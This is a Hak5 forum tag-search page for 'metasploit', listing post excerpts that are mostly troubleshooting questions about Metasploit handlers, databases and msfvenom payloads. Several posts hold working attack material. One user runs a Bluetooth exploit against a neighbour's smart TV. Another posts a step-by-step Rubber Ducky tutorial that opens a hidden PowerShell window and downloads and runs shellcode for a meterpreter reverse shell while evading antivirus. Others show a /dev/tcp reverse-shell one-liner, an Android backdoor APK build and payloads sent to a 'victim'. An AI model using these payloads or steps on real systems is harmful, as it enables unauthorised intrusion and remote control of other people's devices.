Jump to content

Search the Community

Showing results for tags 'metasploit'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Hope someone can help me....... I used CVE-2017-0785 to exploit my neighbours SmartTV...... It gave me this out ---> sudo python CVE-2017-0785.py TARGET=CC:B1:1A:F6:D7:76 [!] Pwntools does not support 32-bit Python. Use a 64-bit release. [+] Exploit: Done 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 01 │····│····│····│····│ 00000030 b5 69 01 00 b4 8f e9 c0 00 00 00 00 b5 54 fe a3 │·i··│····│····│·T··│ 00000040 00 00 00 06 b5 69 39 70 b4 8f e9 e0 b5 60 61 38 │····│·i9p│····│·`a8│ 00000050 b5 60 61 38 b5 69 39 70 b5 69 39 64 b5 69 5a a4 │·`a8│·i9p│·i9d│·iZ·│ 00000060 b4 8f e9 f8 00 00 00 00 b5 69 5a a4 00 00 00 41 │····│····│·iZ·│···A│ 00000070 b4 8f eb 84 b5 54 e6 f9 b5 60 61 38 b5 69 41 78 │····│·T··│·`a8│·iAx│ 00000080 b4 8f ea 08 b5 56 e0 4f b4 8f ea 10 b5 54 57 fd │····│·V·O│····│·TW·│ 00000090 00 00 00 00 b5 69 41 60 b5 56 79 59 b5 69 39 64 │····│·iA`│·VyY│·i9d│ 000000a0 b4 8f ea 30 00 00 00 18 b4 8f ea d0 b5 54 ca c3 │···0│····│····│·T··│ 000000b0 b5 69 41 60 00 00 00 05 b5 60 61 38 b4 8f ea 58 │·iA`│····│·`a8│···X│ 000000c0 00 00 00 18 b4 8f ea d0 b5 69 39 64 b5 54 d2 bf │····│····│·i9d│·T··│ 000000d0 00 00 00 00 b4 30 04 90 00 00 00 00 42 27 e0 00 │····│·0··│····│B'··│ 000000e0 00 00 00 00 b5 69 39 64 00 00 00 08 00 00 00 01 │····│·i9d│····│····│ 000000f0 b4 30 04 90 b4 8f ea d0 00 00 00 41 b5 69 39 64 │·0··│····│···A│·i9d│ 00000100 b4 8f ea a8 b5 69 41 60 00 00 00 03 b5 69 39 64 │····│·iA`│····│·i9d│ 00000110 b5 60 61 38 b4 30 c8 d8 b4 8f ea a0 b5 56 e0 4f │·`a8│·0··│····│·V·O│ 00000120 b4 8f ea a8 b5 56 f6 21 b4 30 c8 d8 41 02 6f 10 │····│·V·!│·0··│A·o·│ 00000130 b4 8f ea b8 b5 50 a1 b7 21 00 00 14 0e 0a 24 00 │····│·P··│!···│··$·│ 00000140 b5 60 61 38 b5 69 ab 60 b4 8f ea d0 b5 56 e0 4f │·`a8│·i·`│····│·V·O│ 00000150 b4 8f ea d8 b5 69 ab 58 b3 6d d4 87 00 00 00 00 │····│·i·X│·m··│····│ 00000160 b4 8f ea f8 00 00 00 02 00 00 00 10 b3 6d f4 b0 │····│····│····│·m··│ 00000170 b5 60 61 38 b5 56 d2 45 b4 8f eb 10 00 00 00 00 │·`a8│·V·E│····│····│ 00000180 b5 69 5a a4 00 00 00 41 00 00 00 13 b5 54 e6 f9 │·iZ·│···A│····│·T··│ 00000190 b4 8f ed 24 b5 69 41 60 b5 60 61 38 b4 8f eb 30 │···$│·iA`│·`a8│···0│ 000001a0 00 00 00 19 b4 8f ed 24 00 00 00 41 b5 54 9f 4b │····│···$│···A│·T·K│ 000001b0 00 00 00 00 b5 69 41 60 b5 60 61 38 00 00 00 64 │····│·iA`│·`a8│···d│ 000001c0 b4 8f eb 48 b5 56 e0 4f b4 8f eb 50 b5 56 ef 31 │···H│·V·O│···P│·V·1│ 000001d0 b5 60 61 38 b5 69 ab 60 b5 60 61 38 b5 69 ab 60 │·`a8│·i·`│·`a8│·i·`│ 000001e0 b4 8f eb 68 b5 56 e0 4f b4 8f eb 70 b5 54 57 fd │···h│·V·O│···p│·TW·│ 000001f0 b5 69 ab 58 b4 8f ed 24 00 00 00 41 b5 69 ab 10 │·i·X│···$│···A│·i··│ 00000200 b4 8f eb 90 00 00 00 0f b4 8f ed 24 b5 56 82 8b │····│····│···$│·V··│ 00000210 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000220 b5 60 61 38 b5 60 61 38 b3 6e 95 b8 00 00 00 41 │·`a8│·`a8│·n··│···A│ 00000230 b4 8f eb c8 00 00 00 41 b3 6e 95 b8 b5 60 61 38 │····│···A│·n··│·`a8│ 00000240 b3 6e b5 f0 b5 56 79 25 b5 56 78 bd b5 69 41 60 │·n··│·Vy%│·Vx·│·iA`│ 00000250 b5 69 39 64 00 00 00 14 b4 8f eb e0 b5 54 cd db │·i9d│····│····│·T··│ 00000260 b5 56 79 59 b5 69 39 64 b4 8f eb f0 b5 54 c9 f5 │·VyY│·i9d│····│·T··│ 00000270 b5 69 41 60 b5 69 41 60 00 00 00 06 b5 60 61 38 │·iA`│·iA`│····│·`a8│ 00000280 b4 8f ec 18 00 00 00 14 b3 6e f6 60 b5 54 d2 13 │····│····│·n·`│·T··│ 00000290 b5 54 da cd b5 69 41 60 00 00 00 00 b5 69 39 64 │·T··│·iA`│····│·i9d│ 000002a0 b4 8f ec 38 00 00 00 00 00 00 00 00 b5 60 00 00 │···8│····│····│·`··│ 000002b0 b5 60 61 38 b3 6f 16 a0 00 00 00 41 00 00 00 0f │·`a8│·o··│···A│····│ 000002c0 b4 8f ec 68 00 00 00 0f b3 6f 16 a8 b5 60 61 38 │···h│····│·o··│·`a8│ 000002d0 b3 6f 36 d0 b5 54 6e 5d 00 00 00 00 ff ff ff ff │·o6·│·Tn]│····│····│ 000002e0 00 00 00 00 b5 68 13 71 00 00 00 0c b5 69 39 70 │····│·h·q│····│·i9p│ 000002f0 00 00 00 0e b5 5d 62 84 b5 5d 62 c0 b5 5d 62 e0 │····│·]b·│·]b·│·]b·│ 00000300 b5 5d 63 10 b5 5d 63 3c b5 5d 63 68 00 00 00 41 │·]c·│·]c<│·]ch│···A│ 00000310 b3 6c 82 1c 00 00 00 01 00 00 00 00 b3 6c 82 36 │·l··│····│····│·l·6│ 00000320 b4 8f ed 24 00 00 00 41 b3 6c 82 36 00 00 00 00 │···$│···A│·l·6│····│ 00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000340 00 00 00 00 b5 60 61 38 b5 60 61 38 b5 69 39 70 │····│·`a8│·`a8│·i9p│ 00000350 b5 69 39 64 b5 69 5a a4 b4 8f ec f0 00 00 00 00 │·i9d│·iZ·│····│····│ 00000360 b5 69 5a a4 b4 31 15 07 b5 69 39 70 b5 54 e6 f9 │·iZ·│·1··│·i9p│·T··│ 00000370 b5 69 39 64 00 00 00 02 b5 69 5a a4 b4 8f ed 20 │·i9d│····│·iZ·│··· │ 00000380 b4 31 15 07 00 00 00 0c b4 31 15 07 b5 54 ea 59 │·1··│····│·1··│·T·Y│ 00000390 00 00 00 00 00 00 00 00 00 00 00 00 41 02 6f 10 │····│····│····│A·o·│ 000003a0 b5 5d 88 94 b5 5d 88 5c b4 8f f8 f0 b5 69 f7 20 │·]··│·]·\│····│·i· │ 000003b0 00 00 02 e9 42 2b d0 10 00 00 01 74 00 00 00 00 │····│B+··│···t│····│ 000003c0 b4 8f ed 58 00 00 00 00 b4 8f ed 50 00 00 00 81 │···X│····│···P│····│ 000003d0 42 2b cc 60 b4 8f ed 60 00 00 00 00 00 00 00 00 │B+·`│···`│····│····│ 000003e0 00 00 00 00 b5 69 f7 20 b5 69 f6 d4 00 00 00 00 │····│·i· │·i··│····│ 000003f0 b4 8f ed 78 b5 69 f6 b0 00 00 00 00 00 00 ff ff │···x│·i··│····│····│ 00000400 b4 8f ed 98 b4 8f ed 90 b4 8f f8 f0 0e 0a 24 00 │····│····│····│··$·│ 00000410 b4 8f ed 98 │····││ 00000414 Who knows what to do now with this Code?
  2. Hi guys, Anyone know how I can get shell access in using any modern browsers (Chrome, IE, Firefox, etc. so that the browser doesn't bitch at me and say I need to upgrade to latest browser version) by browsing to a URL? I tried putting a malicious iframe on my evil portal and using these exploits: auxiliary/server/browser_autopwn, auxiliary/server/browser_autopwn2. I even tried downgrading to IE 8 then using the exploit: exploit/windows/browser/ms10_002_aurora. But so far I got nothing. :( No meterpreter sessions. This is for a presentation, by the way. Any of you guys suggest a different way? I am desperate. Wait not really. Just really frustrated. Hope someone can help. Thanks in advance!
  3. Hello I have a problem. I don't know how to set up a database for metasploit msf > db_status postgresql selected, no connection /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:210:in `initialize': Permission denied @ rb_sysopen - /Users/jiminsha/.msf4/history (Errno::EACCES) from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:210:in `open' from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:210:in `run' from /opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:48:in `start' from /opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in `start' from /opt/metasploit-framework/bin/../embedded/framework/msfconsole:48:in `<main>' I am on mac... that is why I can't find any tutorial please help.
  4. Hi guys, Anyone know how I can get shell access in using any modern browsers (Chrome, IE, Firefox, etc. so that the browser doesn't bitch at me and say I need to upgrade to latest browser version) by browsing to a URL? I tried putting a malicious iframe on my evil portal and using these exploits: auxiliary/server/browser_autopwn, auxiliary/server/browser_autopwn2. I even tried downgrading to IE 8 then using the exploit: exploit/windows/browser/ms10_002_aurora. But so far I got nothing. :( No meterpreter sessions. This is for a presentation, by the way. Any of you guys suggest a different way? I am desperate. Wait not really. Just really frustrated. Hope someone can help. Thanks in advance!
  5. bro i made a payload in metasploit by using ngrok without portforwarding so that i can go WAN...but in ngrok the port get changed everytime i open it...so ineed to make the payload again and again and send it to the victim...is there any way i can overcome this
  6. Hi Guys, I can't figure out what I am doing wrong or if there is something wrong with my Metasploit setup v4.16.7 I have created a basic reverse_tcp payload with msfvenom, when I start my listener I do the following msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.8 LHOST => 192.168.0.8 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.0.8:4444 msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.0.7 [*] Meterpreter session 1 opened (192.168.0.8:4444 -> 192.168.0.7:50298) at 2017-10-25 16:05:13 -0400 I am expecting to see a meterpreter but nothing... What's weird is I have watched a few tutorials and after typing exploit the console "waits" for the payload to be executed, once that happens the interpreter appears, but after I type exploit the console does not wait, I got straight back to msf exploit(handler) > Any help much appreciated.
  7. I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks.. msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.128 lhost => 192.168.43.128 msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.128 yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.128:3344 msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
  8. Hey just wondering if anyone can offer some advice. I am new to hacking and am loving it so far. I have started doing a hacking course I found online. But I have run into a wall. Whenever I go to run an exploit I always get the error code multi handler failure to bind or bad config. I have searched and there are a million different opinions. And I have tried changing the ports apache2 listens on. I have reinstalled kali multiple time. I have tried it on vm and and as my os. I have changed the settings in my vm from nat to nat network and even bridged. And I have run out of ideas ? Any advice would be greatly appreciated.
  9. hi! I'm trying to get into a Windows 10 64x computer in the same LAN than another 86x pc with Kali Linux. Once I finally get into the target pc (w10) and the meterpreter session is open, the meterpreter session command prompt doesn't appear, I mean, I don't get the meterpreter> command prompt... What I'm doing wrong? Thaks!!
  10. Hey, i'm reading a book Metasploit The Penetration Testers Guide and in it the author mentions that in general you should not set the THREADS value in Metasploit to more than 16 on Windows machines and more than 128 on UNIX style machines. I'm just curious as to why, and also why so little on windows? Later in the book the author also uses 255 threads for a port scan. Thanks
  11. Hello, everyone I have successfully used metasploit to hack android on LAN using my own android Hotspot connection. Now, I want to know how to use metasploit over WAN using the same. I can only connect my Kali Machine to my android Hotspot connection for Internet connectivity. I have searched over net there are solutions like SSH tunneling and port forward from your android. Some are saying that your ISP must have blocked the LPORT that you have used. Some are suggesting using VPN. I am really confused what to do can anyone help me out.
  12. Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we? Step 1: Fire up Kali Linux and open a terminal. And using msfvenom we are going to create a shellcode. Enter this code: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt The first part "msfvenom" indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine, open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in powershell format (obviously since we're using powershell). And the last part after the ">" indicates the location where this payload will be saved in. STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer). Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that! STEP 3: Now the fun part! Time to code the ducky. Copy and Paste my code and change the corresponding lines. DELAY 500 GUI x DELAY 1000 a DELAY 1000 ALT y DELAY 1000 STRING powershell -WindowStyle hidden ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1') ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp') ENTER DELAY 1000 STRING Invoke-Shellcode -Shellcode ($buf) -Force ENTER What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code. To set up the listener, open up a terminal in Kali. >msfconsole >use exploit/multi/handler >set payload windows/x64/meterpreter/reverse_https >set LHOST XXX (whatever IP you used, which would be your kali machine IP) >set LPORT XXX (whatever port you used) >exploit And there you go! Of course, have your listener before doing the attack. If you have any questions, please comment! this is my first actual tutorial, so feedback is wanted.
  13. Hello. I was messing around with metasploit. Im using Armitage. Everything worked fine before. I created a new payload and the old one stopped getting a stage. It just hangs at Starting the payload handler... The new one works fine. Need help fixing it please. Here's the Armitage log: msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST PUBLIC IP LHOST => PUBLIC IP msf exploit(handler) > set LPORT 4443 LPORT => 4443 msf exploit(handler) > set Encoder x86/shikata_ga_nai Encoder => x86/shikata_ga_nai msf exploit(handler) > set EXITFUNC process EXITFUNC => process msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > set Iterations 3 Iterations => 3 msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on PUBLIC IP:4443 [*] Starting the payload handler...
  14. Hi Guys, I'm just curios that is there anyway to get a reverse shell or to host things in the network without using a router?? Uhmm well i want to know that whether we can find alternatives for portforwarding?,...like tunneling for example reverse ssh tunneling and vpn gateways...blah blah blah.I want a solution for this stuff. Please guys help me make out! I'm having a mobile with 4g internet connection.I'm mconnecting my laptop to the internet via usb tethering,also my laptop has wifi interface incase you can suggest alternatives! I want a way to pentest in the WAN with my mobile usb tethering! THANKS Hak5!
  15. I'm trying to create a windows executable meterpreter payload using msfvenom to execute on my own computer running Windows 7 64-bit. I've tried using the following commands to produce the executable: 1.) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe 2.) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe 3.) msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe 4.) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -k -f exe > trojan.exe I've also tried using encoders and other payloads. I tried running the executables on multiple Windows 7 64-bit OS computers, but all I got was this message: "The version of this file is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher." When I tried running it in command prompt it showed me this: Unsupported 16-Bit Application "The program or feature cannot start or run due to incompatibility with 64-bit versions of Windows. Please contact the software vendor to ask if a 64-bit Windows compatible version is available." I'm running Metasploit Framework on both Linux Mint and Kali Linux. I've port forwarded the port, tried changing the IP address, turned off all firewalls and AV software, as well as reinstalling Linux Mint and Kali Linux and updating them plus Metasploit Framework. I've tried google to find a solution, but so far I haven't found it. Any ideas on this problem? Any help would be appreciated.
  16. I am fuzzing around with Metasploitable and I ran a vulnerability scan with Nessus. I obviously got a bunch of critical vulnerabilities but I am clueless on what they are and how the exploit works. I did google it but their explanations are rather vague or just complex for me to understand (I am a stereotypical Script Kiddie, feel free to call me dumb). Can someone please tell me how and from where do I search more about the vulnerability and the exploit. Often the exploits are written in ruby (or languages that I am not fluent in, even the pro's aren't good in every language are they?) and I am just starting to learn it. (I am good in python though, I can understand most of the code). I am reading networking books along the lines and am good with Linux. Other than researching exploits and vulnerabilities can you explain how you got into and better with penetration testing? Thank you.
  17. Hi, I have been tasked with trying to figure out if the systems we use have any vulnerabilities. I need to set up a generic looking website that will look at the browser, OS etc. that the visitor to the site is using and list known vulnerabilities. The only thing I have found so far is Autopwn2 in Metasploit. It seems to be vary limited in that you have the browser go to a specific URL that will then go through a list of known vulnerabilities and when it finds one, try to attack the browser. What I want is: 1) To have a lot larger of a list and try all of them. 2) To NOT attack the browser. I simply want a list of vulnerabilities this browser, OS etc. has and what my options are. Any advice?
  18. Hi everybody! im trying to use wordpress long password dos auxiliary in metasploit ... but it keeps getting some bad ass error about a month ago i was still using ubuntu and this module was working so god ... but since i moved in to kali im having trouble with it [Forgive me for my fucked up english] these are the error(s): [*] Checking if user "admin" exists... [+] Username "admin" is valid [-] Auxiliary failed: ActiveRecord::StatementInvalid PG::InvalidTextRepresentation: ERROR: invalid input syntax for type inet: "myhost(that i set for rhost)" : SELECT "hosts".* FROM "hosts" WHERE "hosts"."address" = $1 AND "hosts"."workspace_id" = $2 ORDER BY "hosts"."id" ASC LIMIT 1 [-] Call stack: [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:602:in `exec_prepared' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:602:in `block in exec_cache' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract_adapter.rb:484:in `block in log' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/notifications/instrumenter.rb:20:in `instrument' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract_adapter.rb:478:in `log' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:601:in `exec_cache' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:585:in `execute_and_clear' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql/database_statements.rb:160:in `exec_query' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract/database_statements.rb:356:in `select' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract/database_statements.rb:32:in `select_all' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract/query_cache.rb:70:in `select_all' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/querying.rb:39:in `find_by_sql' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:639:in `exec_queries' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:515:in `load' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:243:in `to_a' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation/finder_methods.rb:500:in `find_nth_with_limit' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation/finder_methods.rb:484:in `find_nth' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation/finder_methods.rb:127:in `first' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:155:in `first_or_create' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:555:in `create_credential_service' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:423:in `create_credential_origin_service' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:353:in `create_credential_origin' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:117:in `create_credential' [-] /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:34:in `create_credential' [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:88:in `report_cred' [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:100:in `user_exists' [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:119:in `run' [*] Auxiliary module execution completed
  19. Whenever I type the following: pc@pc-eME732Z ~/Downloads/metasploit-framework-master $ msfconsole /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/dependencies.rb:274:in `require': cannot load such file -- robots (LoadError) from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/dependencies.rb:274:in `block in require' from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/dependencies.rb:240:in `load_dependency' from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/dependencies.rb:274:in `require' from /opt/metasploit-framework/lib/metasploit/framework.rb:18:in `<top (required)>' from /opt/metasploit-framework/lib/metasploit/framework/database.rb:1:in `require' from /opt/metasploit-framework/lib/metasploit/framework/database.rb:1:in `<top (required)>' from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `require' from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `<top (required)>' from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `require' from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `<top (required)>' from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:263:in `require' from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:263:in `const_get' from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:263:in `block in constantize' from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:259:in `each' from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:259:in `inject' from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:259:in `constantize' from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/core_ext/string/inflections.rb:66:in `constantize' from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:73:in `parsed_options_class' from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:69:in `parsed_options' from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:47:in `require_environment!' from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:81:in `start' from /usr/local/bin/msfconsole:48:in `<main>' Please help !!! I use LInux Mint 32 bit
  20. Not totally sure what I'm doing. I started a reverse shell on my ubuntu machine. 0<&96-;exec 96<>/dev/tcp/192.168.1.4/2222;sh <&96 >&96 2>&96 I get a file descriptor error when I run the command but it opens a shell and I can interact with the target system (Ubuntu 16.04 Desktop). When I use cron_persistence from armitage it seems to work fine. When I reboot the target it just black screens and never runs desktop. It's funny. I had been hacked running Ubuntu about a week ago but I figured that the attacker had intentionally PDOSed my system. It was probably accidental. Anybody have any idea what's going on here? What am I doing wrong with the shell and what do I do to fix the issue on the target machine?
  21. I'm in Metasploit and I did a db_nmap -O 192.168.**** to scan the OS version on a computer that's in my network and it came out and said that it was a Windows 7 machine however I am running Windows 10 on it. What do?
  22. Venom .dll vector(winrar/sfx compressed + fast_migrate.rc)-By Spirit Hello Hak5 members, Actually i am new here and i love Hak5 show. I am also a YouTuber and i will love to share my tutorials here. So if you don't know me then let me introduce myself I'm Spirit , 15 years old YouTuber and today i'm here to tell you about the malicious " .dll vector " to exploit windows OS's. In this tutorial we will compress two file(our payload) to one .exe executable file with SFX and we will also use fast_migrate to migrate our process to wininit.exe. So in this tutorial Our, Attacker machine::Backbox (which is using Venom The Shellcode Generator) Victim::Windows 7 Framework that we will use::Metasploit So, if you like my tutorial then please Subscribe/Like/Share my Channel. ------------------------------------------------------------------------------------------------------------ This tutorial is for educational purpose only. I'll not be responsible for any harm. ------------------------------------------------------------------------------------------------------------ Please Subscribe my channel:: www.youtube.com/c/Pentestingwithspirit && Please like our facebook page also:: www.facebook.com/Pentestingwithspirit Follow me on twitter:: @spirit3113
